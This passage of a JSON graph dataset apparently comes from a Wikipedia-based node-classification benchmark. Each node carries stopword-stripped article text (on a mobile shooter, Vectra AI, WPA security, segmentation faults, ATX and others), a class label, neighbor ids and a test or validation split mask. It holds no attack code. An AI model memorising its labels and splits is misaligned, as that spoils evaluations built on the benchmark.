dynamically vendor-specific feature provided several vendors 3com dynamic change idea made 802.11i part tkip actual wep algorithm",
    "neighbors": [
      7426,
      262,
      3084,
      4364,
      9356,
      2961,
      1941,
      1814,
      5659,
      4514,
      9640,
      1067,
      8497,
      11185,
      7222,
      5561,
      5437,
      6466,
      584,
      8909,
      2006,
      1114,
      10332,
      8286,
      7135,
      3300,
      4580,
      10341,
      11241,
      2154,
      10346,
      10349,
      8694,
      6779,
      8828,
      5373,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 10330,
    "label": 2,
    "text": "Modern_Combat:_Sandstorm:modern combat sandstorm modern combat sandstorm 2009 first-person shooter developed published gameloft ios webos bada android first game modern combat series followed 2010 2011 2012 2014 game set middle east sandstorm plays similarly game features ten missions varied environments different tasks players complete main enemies game terrorists often player accompanied soldiers fight alongside movement controlled virtual joystick screen sight aim controlled scrolling across touchscreen players also crouch throw grenades use iron sights reload change weapons shoot using virtual buttons touchscreen controls customized main menu online multiplayer ability added sandstorm free update january 28 2010 chief warrant officer mike chief warrens returns injury active duty war terrorism middle east reunites old squad dozer ryan fox captain jones completing training run chief joins squad head destroy terrorist radio outpost successfully completing mission await evacuation disused hotel extraction helicopter shot forced defend hotel safely extracted humvee mission squad notice terrorists seemed ready coming conclusion someone leaking information sent hospital capture abu bahaa terrorist warlord chief dozer infiltrate hospital sewer system ryan jones wait outside reaching bahaa room chief discovers tricked hospital rigged explosives dummy placed bahaa hospital bed chief dozer manage escape unscathed outside jones injured ryan killed jones recovers squad break dockyard bahaa using store large nuclear weapon discover terrorists enormous base underground entrance hidden within metal freight container chief sent find nuke encounters bahaa inside forced allow escape locate bomb could detonated terrorists minute eventually finds able secure bahaa flees attempts escape truck squad pursue humvee chasing dockyard train tunnel eventually flipping truck reaches highway squad find bahaa lying truck still alive dozer prepares secure however jones betrays squad killing dozer taking fox hostage bahaa taunts chief saying weak choice surrender chief shoots jones falls ground fox bahaa pulls two grenades jacket prepares blow chief fox pulls ground tells chief run chief takes cover humvee bahaa fox killed explosion chief subsequently promoted becomes hero returning us travels fox residence meets wife informing husband act martyrdom saved life variety weapons modern combat sandstorm range two assault rifles one higher rate fire movement speed lacking power accuracy comparison smg shotgun sniper rifle rpg weapons found stored crates often inside side building along path indicated missions weapons include m16a3 mp5a2 m870 ak-47 m24 sws m249 rpg-7 high-definition version game released april 1 2010 ipad features updated controls graphics make use ipad larger screen upon release sandstorm received extremely positive reviews ios version holds aggregate score 83 gamerankings based seven reviews ign mark bozon scored 8.5 10 calling game pushes system gamers would expect possible ... sandstorm nice blending power manageable touch controls ends way game 'd expect find mere 6.99 ... 're willing put little time learning controls sandstorm impressive shooter proof iphone handle fps gaming 148apps equally impressed scoring 4 5 praising graphics modern combat features impressive 3d graphics iphone best graphics best period textures surprisingly detailed character models great annoying pop-up however less impressed gameplay mission structure simply linear map narrow little choice movement blatant green arrows also guide preventing hope exploration appspy dave flodine scored game 5 5 believing set new bar first person shooters idevices modern combat sandstorm mold future fpss iphone cast game without issues offering workable control scheme superb presentation solid play length could n't ask better title satisfy iphone fps cravings pocket gamer jon jordan similarly impressed scoring game 8 10 giving silver award especially impressed control schemes really clever way gameloft shaped gameplay modern combat sandstorm turn limitations iphone comes first person shooters notably touch controls game strength slide play chris reed scored game 4 4 also believing game set new standard idevices gaming experience modern combat sandstorm great one controls best 've seen iphone fps graphics beautiful plenty level variety sure 've seen idevice never small price like first-person shooters buy game eli hodapp toucharcade scored game 4 5 expressing similar sentiments pocket gamer slide play modern combat sandstorm excellent game raises bar expected future first person shooters iphone well added short list games fantastic on-screen controls ... 're interested shooters looking great game flex muscles iphone look modern combat sandstorm touchgen matt dunn slightly less impressed reviewers scored game 3.5 5 critical ai really n't much way ai modern combat story story modern combat bland best generic terrorist driven plot descent twist end game makes attempt suck connect squad-mates hard really care ... dialogue storyline feel like written someone knows little armed forces wrote story based war games 've played praised graphics textures crisp look great close gun models reloading/first-person character animations awesome controls everything feels accessible logical",
    "neighbors": [
      10080,
      9732,
      6539,
      7029,
      6940
    ],
    "mask": "None"
  },
  {
    "node_id": 10331,
    "label": 4,
    "text": "Vectra_AI:vectra ai vectra ai inc. applies artificial intelligence detects responds hidden cyberattackers inside cloud data center enterprise networks company ’ cognito platform designed detect cyberattacker behaviors infrastructures allow security analysts conduct incident investigations hunt hidden threats using security-enriched metadata augment cognito platform vectra threat researchers identify investigate cyberattacks vulnerabilities malicious behaviors unknown world data sets research data scientists develop machine learning algorithms behavioral analysis drive cognito platform investors vectra include khosla ventures tcv accel partners ia ventures ame cloud ventures dag ventures wipro ventures atlantic bridge ireland strategic investment fund nissho electronics silver lake vectra founded 2010 tracevector llc new york city incorporated 2012 name vectra networks company headquartered san jose calif. facilities austin texas cambridge mass. switzerland germany ireland united kingdom france vectra ’ team includes threat researchers white hats data scientists security engineers user interface designers key executives hitesh sheth president chief executive officer oliver tavakoli chief technology officer howie shohet chief financial officer kevin moore senior vice president worldwide field operations didi dayton vice president worldwide channels alliances jennifer wang vice president customer success mike banic vice president marketing kevin kennedy vice president product management jason kehl vice president engineering aaron bean vice president human resources gerard bauer vice president emea sales board members include hitesh sheth president ceo vectra kevin dillon co-founder managing partner atlantic bridge charles giancarlo ceo pure storage brad gillespie general partner ia ventures jim messina founder ceo messina group bruce armstrong operating partner kholsa ventures eric wolford venture partner accel partners cognito platform vectra provides continuous automated threat surveillance expose hidden unknown cyberattackers actively spread inside networks cognito analyzes network traffic private data centers public clouds enterprise environments detect hidden cyberattacker behaviors cognito platform identifies prioritizes threat detections based severity certainty scores empowers security teams prevent data loss quickly mitigating serious attacks first threat behaviors cyberattack techniques detected cognito include botnet command-and-control communications botnet monetization internal reconnaissance lateral movement data theft exfiltration vectra offers three applications cognito platform address use cases using ai incident detection triage security operations center helped one vectra customer – texas university system – resolve incident 10 20 minutes rather hours days vectra ai combines data science machine learning network behavioral analysis technologies identify patterns characterize malicious behavior within network cognito uses artificial intelligence including supervised learning unsupervised machine learning deep learning techniques detect respond advanced cyberattacks remediation actions taken security information event management siems firewalls endpoint security enforcement network access control orchestration integrated cognito via application programming interface vectra issued ten u.s. patents advanced cyber security analytics capabilities automated ai vectra publishes attacker behavior industry reports provide analysis active persistent attacker behaviors inside enterprise networks vectra customers reports examine wide range cyberattack detections trends 300+ vectra customersfrom nine different industries reports span strategic phases attack lifecycle vectra customers received industry recognition including",
    "neighbors": [
      8998,
      2953,
      4883,
      11611,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 10332,
    "label": 4,
    "text": "Wi-Fi_Protected_Access:wi-fi protected access wi-fi protected access wpa wi-fi protected access ii wpa2 wi-fi protected access 3 wpa3 three security protocols security certification programs developed wi-fi alliance secure wireless computer networks alliance defined response serious weaknesses researchers found previous system wired equivalent privacy wep wpa sometimes referred draft ieee 802.11i standard became available 2003 wi-fi alliance intended intermediate measure anticipation availability secure complex wpa2 became available 2004 common shorthand full ieee 802.11i ieee 802.11i-2004 standard january 2018 wi-fi alliance announced release wpa3 several security improvements wpa2 wi-fi alliance intended wpa intermediate measure take place wep pending availability full ieee 802.11i standard wpa could implemented firmware upgrades wireless network interface cards designed wep began shipping far back 1999 however since changes required wireless access points aps extensive needed network cards pre-2003 aps could upgraded support wpa wpa protocol implements much ieee 802.11i standard specifically temporal key integrity protocol tkip adopted wpa wep used 64-bit 128-bit encryption key must manually entered wireless access points devices change tkip employs per-packet key meaning dynamically generates new 128-bit key packet thus prevents types attacks compromised wep wpa also includes message integrity check designed prevent attacker altering resending data packets replaces cyclic redundancy check crc used wep standard crc main flaw provide sufficiently strong data integrity guarantee packets handled well tested message authentication codes existed solve problems required much computation used old network cards wpa uses message integrity check algorithm called tkip verify integrity packets tkip much stronger crc strong algorithm used wpa2 researchers since discovered flaw wpa relied older weaknesses wep limitations message integrity code hash function named michael retrieve keystream short packets use re-injection spoofing wpa2 replaced wpa wpa2 requires testing certification wi-fi alliance implements mandatory elements ieee 802.11i particular includes mandatory support ccmp aes-based encryption mode certification began september 2004 march 13 2006 wpa2 certification mandatory new devices bear wi-fi trademark january 2018 wi-fi alliance announced wpa3 replacement wpa2 new standard uses 128-bit encryption wpa3-personal mode 192-bit wpa3-enterprise forward secrecy wpa3 standard also replaces pre-shared key exchange simultaneous authentication equals defined ieee 802.11-2016 resulting secure initial key exchange personal mode wi-fi alliance also claims wpa3 mitigate security issues posed weak passwords simplify process setting devices display interface wpa designed specifically work wireless hardware produced prior introduction wpa protocol provides inadequate security wep devices support wpa applying firmware upgrades available legacy devices wi-fi devices certified since 2006 support wpa wpa2 security protocols wpa2 may work older network cards different wpa versions protection mechanisms distinguished based target end-user according method authentication key distribution encryption protocol used originally eap-tls extensible authentication protocol transport layer security certified wi-fi alliance april 2010 wi-fi alliance announced inclusion additional eap types wpa- wpa2- enterprise certification programs ensure wpa-enterprise certified products interoperate one another 802.1x clients servers developed specific firms may support eap types certification attempt popular eap types interoperate failure one major issues preventing rollout 802.1x heterogeneous networks commercial 802.1x servers include microsoft internet authentication service juniper networks steelbelted radius well aradial radius server freeradius open source 802.1x server pre-shared key wpa wpa2 remain vulnerable password cracking attacks users rely weak password passphrase wpa passphrase hashes seeded ssid name length rainbow tables exist top 1,000 network ssids multitude common passwords requiring quick lookup speed cracking wpa-psk brute forcing simple passwords attempted using aircrack suite starting four-way authentication handshake exchanged association periodic re-authentication wpa3 replaces cryptographic protocols susceptible off-line analysis protocols require interaction infrastructure guessed password supposedly placing temporal limits number guesses however design flaws wpa3 enables attackers plausibly launch brute-force attacks see dragonblood attack wpa wpa2 n't provide forward secrecy meaning adverse person discovers pre-shared key potentially decrypt packets encrypted using psk transmitted future even past could passively silently collected attacker also means attacker silently capture decrypt others packets wpa-protected access point provided free charge public place password usually shared anyone place words wpa protects attackers n't access password safer use transport layer security tls similar top transfer sensitive data however starting wpa3 issue addressed mathy vanhoef frank piessens significantly improved upon wpa-tkip attacks erik tews martin beck demonstrated inject arbitrary amount packets packet containing 112 bytes payload demonstrated implementing port scanner executed client using wpa-tkip additionally showed decrypt arbitrary packets sent client mentioned used hijack tcp connection allowing attacker inject malicious javascript victim visits website contrast beck-tews attack could decrypt short packets mostly known content arp messages allowed injection 3 7 packets 28 bytes beck-tews attack also requires quality service defined 802.11e enabled vanhoef-piessens attack neither attack leads recovery shared session key client access point authors say using short rekeying interval prevent attacks strongly recommend switching tkip aes-based ccmp halvorsen others show modify beck-tews attack allow injection 3 7 packets size 596 bytes downside attack requires substantially time execute approximately 18 minutes 25 seconds work vanhoef piessens showed wpa used encrypt broadcast packets original attack also executed important extension substantially networks use wpa protect broadcast packets protect unicast packets execution time attack average around 7 minutes compared 14 minutes original vanhoef-piessens beck-tews attack vulnerabilities tkip significant wpa-tkip held extremely safe combination indeed wpa-tkip still configuration option upon wide variety wireless routing devices provided many hardware vendors survey 2013 showed 71 still allow usage tkip 19 exclusively support tkip serious security flaw revealed december 2011 stefan viehböck affects wireless routers wi-fi protected setup wps feature regardless encryption method use recent models feature enable default many consumer wi-fi device manufacturers taken steps eliminate potential weak passphrase choices promoting alternative methods automatically generating distributing strong keys users add new wireless adapter appliance network methods include pushing buttons devices entering 8-digit pin wi-fi alliance standardized methods wi-fi protected setup however pin feature widely implemented introduced major new security flaw flaw allows remote attacker recover wps pin router wpa/wpa2 password hours users urged turn wps feature although may possible router models also pin written label wi-fi routers wps changed compromised wpa3 introduces new alternative configuration devices lack sufficient user interface capabilities allowing nearby devices serve adequate ui network provisioning purposes thus mitigating need wps several weaknesses found ms-chapv2 severely reduce complexity brute-force attacks making feasible modern hardware 2012 complexity breaking ms-chapv2 reduced breaking single des key work moxie marlinspike marsh ray moxie advised enterprises depending mutual authentication properties ms-chapv2 connection wpa2 radius servers immediately start migrating something else tunneled eap methods using ttls peap encrypt mschapv2 exchange widely deployed protect exploitation vulnerability however prevalent wpa2 client implementations early 2000s prone misconfiguration end users cases e.g android lacked user-accessible way properly configure validation aaa server certificate cns extended relevance original weakness mschapv2 within mitm attack scenarios stricter wpa2 compliance tests announce alongside wpa3 certified client software required conform certain behaviors surrounding aaa certificate validation hole196 vulnerability wpa2 protocol abuses shared group temporal key gtk used conduct man-in-the-middle denial-of-service attacks however assumes attacker already authenticated access point thus possession gtk 2016 shown wpa wpa2 standards contain insecure expository random number generator rng researchers showed vendors implement proposed rng attacker able predict group key gtk supposed randomly generated access point ap additionally showed possession gtk enables attacker inject traffic network allowed attacker decrypt internet traffic transmitted wireless network demonstrated attack asus rt-ac51u router uses mediatek out-of-tree drivers generate gtk showed gtk recovered within two minutes less similarly demonstrated keys generated broadcom access daemons running vxworks 5 later recovered four minutes less affects example certain versions linksys wrt54g certain apple airport extreme models vendors defend attack using secure rng hostapd running linux kernels vulnerable attack thus routers running typical openwrt lede installations exhibit issue october 2017 details krack key reinstallation attack attack wpa2 published krack attack believed affect variants wpa wpa2 however security implications vary implementations depending upon individual developers interpreted poorly specified part standard software patches resolve vulnerability available devices april 2019 serious design flaws wpa3 found allow attackers perform downgrade attacks side-channel attacks enabling brute-forcing passphrase well launching denial-of-service attacks wi-fi base stations",
    "neighbors": [
      5892,
      6916,
      262,
      3462,
      7556,
      7049,
      3084,
      4364,
      9356,
      3984,
      2580,
      1941,
      1814,
      5270,
      5659,
      5671,
      9640,
      1067,
      4396,
      6187,
      8237,
      10924,
      7857,
      434,
      3762,
      8497,
      5561,
      11321,
      1083,
      5437,
      5439,
      2430,
      4163,
      3780,
      6466,
      1608,
      8266,
      10058,
      8909,
      2259,
      4053,
      10329,
      10332,
      4063,
      3300,
      4580,
      4581,
      5863,
      2409,
      4074,
      2027,
      9963,
      10346,
      10863,
      11125,
      7031,
      6904,
      6779,
      8828,
      5373,
      3838,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10333,
    "label": 2,
    "text": "Segmentation_fault:segmentation fault computing segmentation fault often shortened segfault access violation fault failure condition raised hardware memory protection notifying operating system os software attempted access restricted area memory memory access violation standard x86 computers form general protection fault os kernel response usually perform corrective action generally passing fault offending process sending process signal processes cases install custom signal handler allowing recover otherwise os default signal handler used generally causing abnormal termination process program crash sometimes core dump segmentation faults common class error programs written languages like c provide low-level memory access arise primarily due errors use pointers virtual memory addressing particularly illegal access another type memory access error bus error also various causes today much rarer occur primarily due incorrect physical memory addressing due misaligned memory access – memory references hardware address rather references process allowed address many programming languages may employ mechanisms designed avoid segmentation faults improve memory safety example rust programming language appeared 2010 employs 'ownership based model ensure memory safety garbage collection employed since around 1960 avoids certain classes memory errors could lead segmentation faults segmentation fault occurs program attempts access memory location allowed access attempts access memory location way allowed example attempting write read-only location overwrite part operating system term segmentation various uses computing context segmentation fault term used since 1950s refers address space program memory protection program address space readable stack read-write portion data segment program writable read-only data code segment writable thus attempting read outside program address space writing read-only segment address space results segmentation fault hence name systems using hardware memory segmentation provide virtual memory segmentation fault occurs hardware detects attempt refer non-existent segment refer location outside bounds segment refer location fashion allowed permissions granted segment systems using paging invalid page fault generally leads segmentation fault segmentation faults page faults faults raised virtual memory management system segmentation faults also occur independently page faults illegal access valid page segmentation fault invalid page fault segmentation faults occur middle page hence page fault example buffer overflow stays within page illegally overwrites memory hardware level fault initially raised memory management unit mmu illegal access referenced memory exists part memory protection feature invalid page fault referenced memory exist problem invalid logical address instead invalid physical address bus error raised instead though always distinguished operating system level fault caught signal passed offending process activating process handler signal different operating systems different signal names indicate segmentation fault occurred unix-like operating systems signal called sigsegv abbreviated segmentation violation sent offending process microsoft windows offending process receives status_access_violation exception conditions segmentation violations occur manifest specific hardware operating system different hardware raises different faults given conditions different operating systems convert different signals passed processes proximate cause memory access violation underlying cause generally software bug sort determining root cause – debugging bug – simple cases program consistently cause segmentation fault e.g. dereferencing null pointer cases bug difficult reproduce depend memory allocation run e.g. dereferencing dangling pointer following typical causes segmentation fault turn often caused programming errors result invalid memory access c code segmentation faults often occur errors pointer use particularly c dynamic memory allocation dereferencing null pointer always result segmentation fault wild pointers dangling pointers point memory may may exist may may readable writable thus result transient bugs example dereferencing variables could cause segmentation fault dereferencing null pointer generally cause segfault reading wild pointer may instead result random data segfault reading dangling pointer may result valid data random data overwritten default action segmentation fault bus error abnormal termination process triggered core file may generated aid debugging platform-dependent actions may also performed example linux systems using grsecurity patch may log sigsegv signals order monitor possible intrusion attempts using buffer overflows writing read-only memory raises segmentation fault level code errors occurs program writes part code segment read-only portion data segment loaded os read-only memory example ansi c code generally cause segmentation fault platforms memory protection attempts modify string literal undefined behavior according ansi c standard compilers catch compile time instead compile executable code crash program containing code compiled string hello world placed rodata section program executable file read-only section data segment loaded operating system places strings constant data read-only segment memory executed variable set point string location attempt made write h character variable memory causing segmentation fault compiling program compiler check assignment read-only locations compile time running unix-like operating system produces following runtime error backtrace core file gdb code corrected using array instead character pointer allocates memory stack initializes value string literal even though string literals modified undefined behavior c standard c codice_1 type implicit conversion original code points codice_2 array c++ codice_3 type thus implicit conversion compilers generally catch particular error c c-like languages null pointers used mean pointer object error indicator dereferencing null pointer read write null pointer common program error c standard say null pointer pointer memory address 0 though may case practice operating systems map null pointer address accessing causes segmentation fault behavior guaranteed c standard dereferencing null pointer undefined behavior c conforming implementation allowed assume pointer dereferenced null sample code creates null pointer tries access value read value causes segmentation fault runtime many operating systems dereferencing null pointer assigning writing value non-existent target also usually causes segmentation fault following code includes null pointer dereference compiled often result segmentation fault value unused thus dereference often optimized away dead code elimination another example recursion without base case causes stack overflow results segmentation fault infinite recursion may necessarily result stack overflow depending language optimizations performed compiler exact structure code case behavior unreachable code return statement undefined compiler eliminate use tail call optimization might result stack usage optimizations could include translating recursion iteration given structure example function would result program running forever probably overflowing stack",
    "neighbors": [
      2560,
      2571,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      3615,
      9762,
      4643,
      6180,
      5158,
      7728,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      2627,
      8773,
      6221,
      3157,
      3160,
      3675,
      2653,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      5744,
      7795,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      8852,
      9366,
      6296,
      2201,
      9370,
      9882,
      2717,
      1694,
      7325,
      9887,
      6829,
      6319,
      3248,
      8879,
      178,
      9907,
      11444,
      6837,
      10933,
      6329,
      8889,
      5823,
      9919,
      8388,
      1736,
      2248,
      9932,
      5840,
      7889,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      3871,
      10016,
      292,
      10235,
      2345,
      815,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      4424,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10584,
      10590,
      8545,
      3426,
      11106,
      8551,
      11624,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      5520,
      7057,
      3474,
      11667,
      11675,
      8092,
      2462,
      5022,
      1952,
      1954,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      5040,
      7601,
      11184,
      10676,
      6075,
      6078,
      9151,
      1474,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      10736,
      499,
      5619,
      3577,
      5115,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10334,
    "label": 5,
    "text": "Lightweight_Access_Point_Protocol:lightweight access point protocol lightweight access point protocol lwapp name protocol control multiple wi-fi wireless access points reduce amount time spent configuring monitoring troubleshooting large network system also allow network administrators closely analyze network system installed central server gathers data rf devices different brands settings server command selected group devices apply given settings simultaneously lwapp proposed airespace standard protocol provide interoperability among brand access point airespace purchased cisco systems purpose standardize lightweight access points internet engineering task force ietf approved standard sponsored cisco systems submitted ietf rfc 5412 although protocol far popular beyond airespace/cisco product lines capwap standard based lwapp support lwapp also found analysis products airmagnet implemented software based protocol analyze cisco wireless products still considered proprietary lwapp systems compete non-standard lightweight wireless mechanisms companies like meru networks aruba networks layer 2 lwapp requires data link connection order transfer frames layer 2 broadcasts even ip connectivity established still operate layer 2 layer 4 udp 12222 data channel 12223 control channel connectivity must established work form protocol broadcasts dhcp option 43 used prime access-points network controller must subnet dhcp configured handle layer 3 lwapp provisioning another option directing ap controller defining controller dns server network",
    "neighbors": [
      6993
    ],
    "mask": "None"
  },
  {
    "node_id": 10335,
    "label": 9,
    "text": "BANCStar_programming_language:bancstar programming language bancstar specialist computer programming language financial applications language internal language national financial computer services inc later broadway seymour bancstar application software automate operations bank branch language fixed format four integer command language nfcs internally referred screen code resembles esoteric programming language much sometimes mistaken joke language conceptually bancstar application executed screen code much like primitive virtual machine 5.1c release legal characters numerals 0–9 comma minus sign carriage return however used real commercial applications originally intended generated code user interface-building tool — similar bytecode rendered ascii — due limitations tool became directly programmed language bancstar 10.0 release changed screen code format binary rearranged numeric codes opcode variable number parameter integers 10.0 opcode encoded bit mapped length value indicated length command words",
    "neighbors": [
      7395,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 10336,
    "label": 2,
    "text": "IPhone_11:iphone 11 iphone 11 series upcoming smartphones designed developed marketed apple rumoured released september 10 2019 steve jobs theater apple park cupertino apple ceo tim cook may go sale september 21 2019 phone unique among iphones details regarding phone widely leaked august 2019 weeks phone release thirteenth-generation flagships iphone successors iphone xs xr phone criticized due small improvements predecessors mainly camera quality reported phone also keep notch design featured iphone x",
    "neighbors": [
      2979,
      9732
    ],
    "mask": "Test"
  },
  {
    "node_id": 10337,
    "label": 3,
    "text": "ATX:atx atx advanced technology extended motherboard power supply configuration specification developed intel 1995 improve previous de facto standards like design first major change desktop computer enclosure motherboard power supply design many years improving standardization interchangeability parts specification defines key mechanical dimensions mounting point i/o panel power connector interfaces computer case motherboard power supply atx common motherboard design standards smaller boards including microatx flexatx nano-itx mini-itx usually keep basic rear layout reduce size board number expansion slots dimensions full-size atx board allows many atx chassis also accept microatx boards official atx specifications released intel 1995 revised numerous times since recent atx motherboard specification version 2.2 recent atx12v power supply unit specification 2.4 released april 2013 eatx extended atx bigger version atx motherboard 12 x 13 inch dimensions advantages eatx motherboard dual socket support 2004 intel announced btx balanced technology extended standard intended replacement atx atx design still remains popular btx introduced manufacturers back computer case major changes made standard originally style cases keyboard connector expansion slots add-on card backplates onboard interfaces serial parallel ports connected via flying leads connectors mounted either spaces provided case brackets placed unused expansion slot positions atx allowed motherboard manufacturer put ports rectangular area back system arrangement could define though number general patterns depending ports motherboard offers followed manufacturers cases usually fitted snap-out panel also known i/o plate i/o shield one common arrangements necessary i/o plates replaced suit motherboard fitted i/o plates usually included motherboards designed particular computer computer operate correctly without plate fitted although open gaps case may compromise emi/rfi screening allow ingress dirt random foreign bodies panels made allowed fitting motherboard atx case atx motherboards come integrated i/o plate atx also made ps/2-style mini-din keyboard mouse connectors ubiquitous systems used 5-pin din connector keyboard generally used serial port mice although ps/2 mouse ports also found systems many modern motherboards phasing ps/2-style keyboard mouse connectors favor modern universal serial bus legacy connectors slowly phased modern atx motherboards include 25-pin parallel ports 9-pin rs-232 serial ports place onboard peripheral ports ethernet firewire esata audio ports analog s/pdif video analog d-sub dvi hdmi displayport extra usb ports wi-fi several atx-derived designs specified use power supply mountings basic back panel arrangement set different standards size board number expansion slots standard atx provides seven slots spacing popular microatx size removes three slots leaving four width refers distance along external connector edge depth front rear note larger size inherits previous smaller colors area note aopen conflated term mini atx recent design since references mini atx removed atx specifications since adoption microatx aopen definition contemporary term one listed apparently historical significance number manufacturers added one two three additional expansion slots standard 0.8 inch spacing standard 12-inch atx motherboard width form factors considered obsolete 1999 included baby-at full size semi-proprietary lpx low-profile cases proprietary motherboard designs compaq packard-bell hewlett packard others existed interchangeable multi-manufacturer boards cases portable notebook computers custom motherboards unique particular products although true e-atx motherboard manufacturers also refer motherboards measurements e-atx e-atx ssi eeb server system infrastructure ssi forum enterprise electronics bay eeb share dimensions screw holes two standards align rendering incompatible 2008 foxconn unveiled foxconn f1 motherboard prototype width standard atx motherboard extended 14.4 length accommodate 10 slots firm called new design motherboard ultra atx ces 2008 showing also unveiled january 2008 ces lian li armorsuit pc-p80 case 10 slots designed motherboard name xl-atx used least three companies different ways september 2009 evga corporation already released xl-atx motherboard evga x58 classified 4-way sli gigabyte technology launched another xl-atx motherboard model number ga-x58a-ud9 2010 measuring ga-x79-ud7 2011 measuring april 2010 gigabyte announced ga-890fxa-ud7 motherboard allowed seven slots moved downward one slot position added length could allowed placement eight expansion slots top slot position vacant particular model msi released msi x58 big bang 2010 msi p67 big bang marshal 2011 msi x79 xpower big bang 2 2012 msi z87 xpower 2013 although boards room additional expansion slots 9 8 total respectively three provide seven expansion connectors topmost positions left vacant provide room cpu chipset associated cooling 2010 evga corporation released new motherboard super record 2 sr-2 whose size surpasses evga x58 classified 4-way sli new board designed accommodate two dual qpi lga1366 socket cpus e.g intel xeon similar intel skulltrail motherboard could accommodate two intel core 2 quad processors total seven pci-e slots 12 ddr3 ram slots new design dubbed hptx atx specification requires power supply produce three main outputs +3.3 v +5 v +12 v. low-power −12 v +5 v standby supplies also required −12 v supply primarily used provide negative supply voltage rs-232 ports also used one pin conventional pci slots primarily provide reference voltage models sound cards 5 v supply used produce trickle power provide soft-power feature atx pc turned well powering real-time clock conserve charge cmos battery −5 v output originally required supplied isa bus removed later versions atx standard became obsolete removal isa bus expansion slots isa bus still found computer compatible old ibm pc specification e.g. found playstation 4 originally motherboard powered one 20-pin connector atx power supply provides number peripheral power connectors modern systems two connectors motherboard 8-pin 4+4-pin auxiliary connector providing additional power cpu main 24-pin power supply connector extension original 20-pin version 20-pin molex 39-29-9202 motherboard 20-pin molex 39-01-2200 cable connector pin pitch 4.2 mm one sixth inch four wires special functions generally supply voltages must within ±5 nominal values times little-used negative supply voltages however ±10 tolerance specification ripple 10 hz–20 mhz bandwidth 20–24-pin molex mini-fit jr. power rating 600 volts 8 amperes maximum per pin using 18 awg wire large server motherboards 3d graphics cards required progressively power operate necessary revise extend standard beyond original 20-pin connector allow current using multiple additional pins parallel low circuit voltage restriction power flow connector pin maximum rated voltage single mini-fit jr pin would capable 4800 watts atx power supplies generally dimensions width height preceding lpx low profile extension form factor often incorrectly referred power supplies due ubiquitous use later baby systems even though actual power supply form factor physically larger share common mounting layout four screws arranged back side unit last dimension 140 mm depth frequently varied depths 160 180 200 230 mm used accommodate higher power larger fan and/or modular connectors original cases flat case style integrated power switch protruded power supply sits flush hole chassis utilizes paddle-style dpst switch similar pc pc-xt style power supplies later so-called baby lpx style computer cases power button directly connected system computer power supply psu general configuration double-pole latching mains voltage switch four pins connected wires four-core cable wires either soldered power button making difficult replace power supply failed blade receptacles used atx power supply typically controlled electronic switch connected power button computer case allows computer turned operating system addition many atx power supplies equivalent-function manual switch back also ensures power sent components switch power supply turned however computer turned front power button power supply connection motherboard changed older lpx standards lpx two similar connectors could accidentally interchanged forcing different keyed connectors place usually causing short-circuits irreversible damage motherboard rule thumb safe operation connect side-by-side connectors black wires together atx uses one large keyed connector connected incorrectly new connector also provides 3.3 volt source removing need motherboards derive voltage 5 v rail motherboards particularly manufactured introduction atx lpx equipment still use support lpx atx psus using atx psu purposes powering atx motherboard power fully turned always partly operate wake-up devices shorting power-on pin atx connector pin 16 green wire black wire ground power button atx system minimum load one voltages may required varies model vendor standard specify operation without minimum load conforming psu may shut output incorrect voltages otherwise malfunction hazardous damaged atx power supply replacement current-limited bench laboratory dc power supply instead better described bulk dc power supply original atx specification called power supply located near cpu power supply fan drawing cooling air outside chassis directing onto processor thought configuration cooling processor would achievable without need active heatsink recommendation removed later specifications modern atx power supplies usually exhaust air case atx introduced late 1995 defined three types power connectors power distribution specification defined psu power provided 5 v 3.3 v rails electronic components cpu ram chipset pci agp isa cards used 5 v 3.3 v power supply 12 v rail used computer fans motors peripheral devices hdd fdd cd-rom etc designing pentium 4 platform 1999/2000 standard 20-pin atx power connector found insufficient meet increasing power-line requirements standard significantly revised atx12v 1.0 atx12v 1.x sometimes inaccurately called atx-p4 atx12v 1.x also adopted amd athlon xp athlon 64 systems however early model athlon xp mp boards including server boards later model lower-end motherboards 4-pin connector described numbering atx revisions may little confusing atx refers design goes version 2.2 2004 24 pins atx12v 2.0 atx12v describes psu instance atx 2.03 pretty commonly seen psu 2000 2001 often include p4 12v connector even norm define yet main changes additions atx12v 1.0 released february 2000 formally called +12 v power connector commonly referred p4 connector first needed support pentium 4 processor pentium 4 processors generally powered 5 v rail later processors operate much lower voltages typically around 1 v draw 100 infeasible provide power low voltages high currents standard system power supply pentium 4 established practice generating dc-to-dc converter motherboard next processor powered 4-pin 12 v connector minor revision august 2000 power 3.3 v rail slightly increased smaller changes made relatively minor revision january 2002 significant change −5 v rail longer required became optional voltage required isa bus longer present almost modern computers introduced april 2003 month 2.0 standard introduced changes mostly minor atx12v 2.x brought significant design change regarding power distribution analyzing power demands then-current pcs determined would much cheaper practical power pc components 12 v rails instead 3.3 v 5 v rails particular pci express expansion cards take much power 12 v rail 5.5 older agp graphics cards took 1 12 v 6 3.3 v. cpu also driven 12 v rail done 5 v rail older pcs pentium 4 power demands pci express incorporated atx12v 2.0 introduced february 2003 defined quite different power distribution atx12v 1.x minor revision june 2004 errant reference −5 v rail removed minor changes introduced minor revision march 2005 power slightly increased rails efficiency requirements changed also released march 2005 includes corrections specifies high current series wire terminals 24-pin atx motherboard 4-pin +12 v power connectors effective march 2007 recommended efficiency increased 80 least 70 required 12 v minimum load requirement lowered higher efficiency generally results less power consumption less waste heat 80 recommendation brings supplies line new energy star 4.0 mandates reduced load 